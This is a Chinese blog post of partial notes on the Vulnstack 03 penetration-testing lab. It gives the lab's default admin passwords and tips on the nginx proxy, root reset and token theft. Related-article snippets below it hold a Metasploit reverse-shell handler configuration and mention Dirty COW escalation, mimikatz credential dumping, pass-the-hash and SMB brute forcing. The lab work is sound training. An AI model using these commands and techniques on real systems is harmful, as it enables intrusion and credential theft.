红日靶机vulnstack03【半总结】

已于 2022-09-18 11:17:49 修改
阅读量524 收藏 1
点赞数
分类专栏: vulnstack 文章标签: vulnstack
于 2021-10-04 13:08:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/120603073
版权

WIN2008\Administrator:123qwe!ASD

TEST\administrator:zxcASDqw123!!

ip就不说了,和前面差不多,都是2个网段。

一、改nginx反向代理服务器

打开centos
在这里插入图片描述
把里面所有的ip都该成ubuntu的ip,因为ubuntu才是真正的服务器,centos只是nginx反向代理服务器

在这里插入图片描述
改了后,记得重启nginx服务

nginx -s reload

在这里插入图片描述

二、在tmp目录下找到的wwwuser用户不行,

这里我们直接改root用户密码,然后登陆上去。
在这里插入图片描述
在这里插入图片描述

三、

简单来说,就是因为是域,所以域管理员或者域用户,都可以登录到任何一台域内机器。
在这里插入图片描述

四、窃取token是单引号!

在这里插入图片描述
在这里插入图片描述

更新11.02

除了域控机,其他2台域用户主机要脱域,再重新加域,并登录域管。

攻略教程如下:
红日安全ATT&CK靶机实战系列之vulnstack3
VulnStack-ATT&CK-3(红日靶场三)
后渗透之meterpreter学习笔记

樱浅沐冰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OWASP靶机、安全学习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
红日靶场第三关
红队是青春
11-18 5652
红日靶场第三关 一、环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 注:名称及网段必须符合上述图片,进行了固定ip配置。 本次环境为黑盒测试,不提供虚拟机账号密码。 win10/kali:VMnet11 攻击机 web-centos:VMnet10、VMnet11 外网 w
ATT&CK红日3靶机渗透攻略
weixin_47311099的博客
01-27 6024
ATT&CK红队评估三攻略 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 启动:直接恢复运行,不建议重启!注意由于靶场封装时桥接的ip可能跟当前IP段不一样,故而需要在centos靶机中输入 service network restart 重启网卡 信息收集 nmap扫描 nmap -sS -sV 192.168.111.0/24 开放了http80 ssh22 mysql3306 网站信息收集 通过wapplayzer插
渗透测试-红日靶场三
最新发布
konglong12311的博客
05-24 819
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1409
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
红日三打靶!!!
woshicainiao666的博客
02-02 836
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
红日靶场】vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 751
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
红日3靶场-wp
shajianlong666的博客
06-04 484
内网渗透之-红日靶场3(传说可让你对内网渗透大彻大悟)
VulnStack-ATT&CK-3(红日靶场三)
buffedon的博客
07-12 9900
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场
qq_47289634的博客
08-01 1215
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
vulnstack-3渗透笔记
weixin_54855337的博客
03-22 248
后面就是通过每一台的win跳板,迁移进程位数对的进程,然后读取使用mimikatz读取hash,最后发现域管理员的账户凭证,但是测试发现两台win靶机都只能读取hash并不能读取文明,标准流程就是在win靶机上面获取到了域管的凭证,然后直接拿win靶机当跳板机,psexec或者wmic进行横向。查看ip发现这台机子位93段的,而不是一开始4段的,判断可能使用了反向代理,将192.168.93.120的80端口转发到了192.168.4.52的80。尝试进行后台登陆,账号为admin2密码为secret。
红日vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1675
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
vulnstack3
m0_70782241的博客
02-21 1413
利用PTH攻击域控服务器
2021-10-17红日靶场3学习转发自pan墨森大佬(下错了虚拟机,joomla,ew代理,navicat,mysql远程登录渗透思路,dirtycow,bypass_disfunction))
qq_45290991的博客
10-17 705
vulstack红队评估(三) </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> 一、环境搭建...
ATT&CK 实战 - 红日安全 vulnstack(三)渗透记录
daxi0ng的博客
12-02 2676
1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128 https://xz.aliyun.com/t/6988 渗透过程: 话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。 1、用msf测了一下版本 2、跑一下端口 3、跑一下目录,发现配置文件的备份文件 4、登陆一下数据库 5、查看一下密码,加密的,并且没有权限改密文。 6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值